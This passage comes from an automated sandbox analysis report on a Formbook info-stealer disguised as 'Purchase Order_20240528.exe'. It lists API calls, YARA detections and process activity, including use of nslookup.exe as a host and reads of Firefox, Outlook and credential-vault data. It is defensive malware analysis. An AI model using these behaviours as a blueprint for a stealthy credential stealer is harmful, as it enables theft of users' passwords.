        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2AD0 NtReadFile,LdrInitializeThunk,5_2_031F2AD0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2AF0 NtWriteFile,LdrInitializeThunk,5_2_031F2AF0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2F30 NtCreateSection,LdrInitializeThunk,5_2_031F2F30
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2FB0 NtResumeThread,LdrInitializeThunk,5_2_031F2FB0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2FE0 NtCreateFile,LdrInitializeThunk,5_2_031F2FE0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_031F2EE0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_031F2D10
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_031F2D30
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2DD0 NtDelayExecution,LdrInitializeThunk,5_2_031F2DD0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_031F2DF0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_031F2C70
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2C60 NtCreateKey,LdrInitializeThunk,5_2_031F2C60
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_031F2CA0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F35C0 NtCreateMutant,LdrInitializeThunk,5_2_031F35C0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F39B0 NtGetContextThread,LdrInitializeThunk,5_2_031F39B0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2B80 NtQueryInformationFile,5_2_031F2B80
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2BA0 NtEnumerateValueKey,5_2_031F2BA0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2BF0 NtAllocateVirtualMemory,5_2_031F2BF0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2BE0 NtQueryValueKey,5_2_031F2BE0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2AB0 NtWaitForSingleObject,5_2_031F2AB0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2F60 NtCreateProcessEx,5_2_031F2F60
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2F90 NtProtectVirtualMemory,5_2_031F2F90
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2FA0 NtQuerySection,5_2_031F2FA0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2E30 NtWriteVirtualMemory,5_2_031F2E30
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2E80 NtReadVirtualMemory,5_2_031F2E80
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2EA0 NtAdjustPrivilegesToken,5_2_031F2EA0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2D00 NtSetInformationFile,5_2_031F2D00
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2DB0 NtEnumerateKey,5_2_031F2DB0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2C00 NtQueryInformationProcess,5_2_031F2C00
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2CC0 NtQueryVirtualMemory,5_2_031F2CC0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2CF0 NtOpenProcess,5_2_031F2CF0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F3010 NtOpenDirectoryObject,5_2_031F3010
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F3090 NtSetValueKey,5_2_031F3090
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F3D10 NtOpenProcessToken,5_2_031F3D10
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F3D70 NtOpenThread,5_2_031F3D70
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A77E60 NtDeleteFile,5_2_02A77E60
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A77F00 NtClose,5_2_02A77F00
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A77C10 NtCreateFile,5_2_02A77C10
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A77D70 NtReadFile,5_2_02A77D70
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032775715_2_03277571
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0325D5B05_2_0325D5B0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032895C35_2_032895C3
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327F43F5_2_0327F43F
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031B14605_2_031B1460
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FB765_2_0327FB76
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031DFB805_2_031DFB80
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03235BF05_2_03235BF0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031FDBF95_2_031FDBF9
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03233A6C5_2_03233A6C
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03277A465_2_03277A46
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FA495_2_0327FA49
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03205AA05_2_03205AA0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03261AA35_2_03261AA3
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0325DAAC5_2_0325DAAC
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0326DAC65_2_0326DAC6
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032559105_2_03255910
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C99505_2_031C9950
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031DB9505_2_031DB950
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0322D8005_2_0322D800
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C38E05_2_031C38E0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FF095_2_0327FF09
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C1F925_2_031C1F92
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FFB15_2_0327FFB1
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03183FD25_2_03183FD2
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03183FD55_2_03183FD5
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C9EB05_2_031C9EB0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03277D735_2_03277D73
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C3D405_2_031C3D40
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03271D5A5_2_03271D5A
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031DFDC05_2_031DFDC0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03239C325_2_03239C32
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FCF25_2_0327FCF2
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A618C05_2_02A618C0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A7A2E05_2_02A7A2E0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A5CACE5_2_02A5CACE
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A5CAD05_2_02A5CAD0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A5CCF05_2_02A5CCF0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A5AD705_2_02A5AD70
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A633E05_2_02A633E0
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: String function: 0323F290 appears 105 times
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: String function: 031AB970 appears 280 times
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: String function: 03207E54 appears 111 times
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: String function: 0322EA12 appears 86 times
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: String function: 031F5130 appears 58 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: String function: 0165EA12 appears 86 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: String function: 0166F290 appears 105 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: String function: 015DB970 appears 280 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: String function: 01625130 appears 58 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: String function: 01637E54 appears 111 times
        Source: Purchase Order_20240528.exe Static PE information: invalid certificate
        Source: Purchase Order_20240528.exe, 00000000.00000002.2087413581.0000000005280000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000002.2084141939.00000000009FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000002.2085247193.0000000002805000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000002.2088150699.0000000006C70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000000.2065405784.00000000004A0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameromN.exe" vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000002.2085740892.000000000398E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001189000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenslookup.exej% vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenslookup.exej% vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe Binary or memory string: OriginalFilenameromN.exe" vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Purchase Order_20240528.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: _0020.SetAccessControl
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: _0020.AddAccessRule
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, wHVIVE5avXWDL9RIrc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, wHVIVE5avXWDL9RIrc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, wHVIVE5avXWDL9RIrc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: _0020.SetAccessControl
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: _0020.AddAccessRule
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: _0020.SetAccessControl
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.cs Security API names: _0020.AddAccessRule
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/13
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order_20240528.exe.log
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Mutant created: NULL
        Source: C:\Windows\SysWOW64\nslookup.exe File created: C:\Users\user\AppData\Local\Temp\7--93mK-
        Source: Purchase Order_20240528.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
        Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: nslookup.exe, 00000005.00000003.2409548605.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2409548605.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4534212709.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4534212709.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Purchase Order_20240528.exe Virustotal: Detection: 41%
        Source: Purchase Order_20240528.exe ReversingLabs: Detection: 26%
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe File read: C:\Users\user\Desktop\Purchase Order_20240528.exe:Zone.Identifier
        Source: unknown Process created: C:\Users\user\Desktop\Purchase Order_20240528.exe "C:\Users\user\Desktop\Purchase Order_20240528.exe"
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Process created: C:\Users\user\Desktop\Purchase Order_20240528.exe "C:\Users\user\Desktop\Purchase Order_20240528.exe"
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe Process created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
        Source: C:\Windows\SysWOW64\nslookup.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: mscoree.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: dwrite.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: amsi.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: windowscodecs.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: ieframe.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: netapi32.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: version.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: mlang.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: winsqlite3.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: vaultcli.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe Section loaded: wininet.dll
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Windows\SysWOW64\nslookup.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Purchase Order_20240528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: Purchase Order_20240528.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: nslookup.pdb source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000124B000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538100125.000000000125D000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000125A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: nslookup.pdbGCTL source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000124B000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538100125.000000000125D000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000125A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2132913413.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2285918681.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp
        Source: Binary string: wntdll.pdbUGP source: Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2213210353.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2209385108.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp
